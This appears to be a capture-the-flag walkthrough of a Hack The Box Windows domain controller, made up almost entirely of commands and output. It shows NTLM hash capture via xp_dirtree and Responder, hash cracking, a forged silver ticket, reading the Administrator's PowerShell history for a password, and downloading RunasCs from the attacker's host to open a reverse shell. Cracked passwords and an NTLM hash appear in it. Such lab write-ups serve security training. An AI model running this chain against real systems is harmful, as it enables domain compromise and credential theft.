Foothold

Sm230#C5NatH

❯ netexec mssql 10.10.11.90 -u scott -p 'Sm230#C5NatH' --local-auth
MSSQL       10.10.11.90     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL       10.10.11.90     1433   DC01             [+] DC01\scott:Sm230#C5NatH

❯ impacket-mssqlclient -p 1433 scott:'Sm230#C5NatH'@10.10.11.90
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott  guest@master)>

SQL (scott  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID
------------------   --------   ---------   ---------   -------------   ----------   -----
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'

guest                public     NULL        NULL        guest           b'2         '   b'00'

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL

sys                  public     NULL        NULL        NULL            b'4         '    NULL

SQL (scott  guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.

SQL (scott  guest@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0

tempdb                   0

model                    0

msdb                     1

sudo responder -I tun0

SQL (scott  guest@master)> xp_dirtree \\10.10.14.17\adot8\
subdirectory   depth   file
------------   -----   ----

hashcat -m 5600 mssqlsvc.hash ~/rockyou.txt -O

mssqlsvc:purPLE9795!@

❯ netexec mssql 10.10.11.90 -u mssqlsvc -p 'purPLE9795!@'
MSSQL       10.10.11.90     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL       10.10.11.90     1433   DC01             [+] SIGNED.HTB\mssqlsvc:purPLE9795!@

❯ impacket-mssqlclient -p 1433 mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  guest@master)> 

SQL (SIGNED\mssqlsvc  guest@master)> SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id WHERE r.name = 'sysadmin';
role       member
--------   -------------------------
sysadmin   sa

sysadmin   SIGNED\IT

sysadmin   NT SERVICE\SQLWriter

sysadmin   NT SERVICE\Winmgmt

sysadmin   NT SERVICE\MSSQLSERVER

sysadmin   NT SERVICE\SQLSERVERAGENT

SQL (SIGNED\mssqlsvc  guest@master)> SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\IT'));

----------------------------------------------------------
0x0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000

SQL (SIGNED\mssqlsvc  guest@master)> SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\mssqlsvc'));

----------------------------------------------------------
0x0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000

SQL (SIGNED\mssqlsvc  guest@master)>

#!/usr/bin/env python3
import struct
import binascii
import argparse

def binary_sid_to_string(binary_sid_hex):
    # Remove leading 0x if present and convert to bytes
    binary_sid_hex = binary_sid_hex.strip()
    if binary_sid_hex.startswith("0x") or binary_sid_hex.startswith("0X"):
        binary_sid_hex = binary_sid_hex[2:]
    binary_sid = binascii.unhexlify(binary_sid_hex)

    # Parse SID structure
    revision = binary_sid[0]
    sub_authority_count = binary_sid[1]
    identifier_authority = struct.unpack('>Q', b'\x00\x00' + binary_sid[2:8])[0]
    sub_authorities = struct.unpack('<' + 'I' * sub_authority_count, binary_sid[8:8 + 4 * sub_authority_count])

    # Build SID string
    sid_str = f'S-{revision}-{identifier_authority}'
    for sa in sub_authorities:
        sid_str += f'-{sa}'
    return sid_str


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Convert a binary MSSQL SID to string format.")
    parser.add_argument("-i", "--input", required=True, help="Binary SID in hex format (e.g., 0x010500...)")
    args = parser.parse_args()

    try:
        sid_string = binary_sid_to_string(args.input)
        print(sid_string)
    except Exception as e:
        print("Error converting SID:", e)

S-1-5-21-4088429403-1159899800-2753317549-1105
S-1-5-21-4088429403-1159899800-2753317549-1103

Domain SID: S-1-5-21-4088429403-1159899800-2753317549
NTLM hash: EF699384C3285C54128A3EE1DDB1A0CC
Groups: 1105, 1103, 512, 519

❯ impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain SIGNED.HTB -groups 1105,512,519 -spn mssqlsvc/DC01.SIGNED.HTB:1433 -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -user-id 1103 mssqlsvc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SIGNED.HTB/mssqlsvc
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache

❯ export KRB5CCNAME=/home/adot/htb/signed/mssqlsvc.ccache
❯ impacket-mssqlclient -p 1433 -k -no-pass DC01.SIGNED.HTB
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  dbo@master)> 

SQL (SIGNED\mssqlsvc  dbo@master)> select x from OpenRowset(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt',SINGLE_CLOB) R(x)

Administrator:Th1s889Rabb!t

PS C:\Programdata> iwr 10.10.14.17/RunasCs.exe

PS C:\Programdata> .\RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r 10.10.14.17:443

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-57be0$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2532 created in background.